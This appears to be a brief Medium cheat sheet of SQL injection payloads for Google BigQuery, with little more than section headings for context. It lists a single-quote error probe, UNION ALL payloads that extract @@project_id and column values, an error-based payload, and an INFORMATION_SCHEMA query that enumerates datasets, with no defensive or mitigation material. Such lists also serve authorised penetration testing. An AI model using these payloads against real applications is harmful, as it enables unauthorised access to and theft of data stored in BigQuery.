BigQuery SQL Injection Cheat Sheet

SELECT column-name FROM [project-name:dataset-name.table-name]
SELECT column-name FROM `project-name:dataset-name.table-name`
Syntax error returns with single quote
' OR if(1/(length((select('a')))-1)=1,true,false) OR '
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
Union based SQL injection example
SELECT * FROM INFORMATION_SCHEMA.SCHEMATA
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
Error based BigQuery SQL injection
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store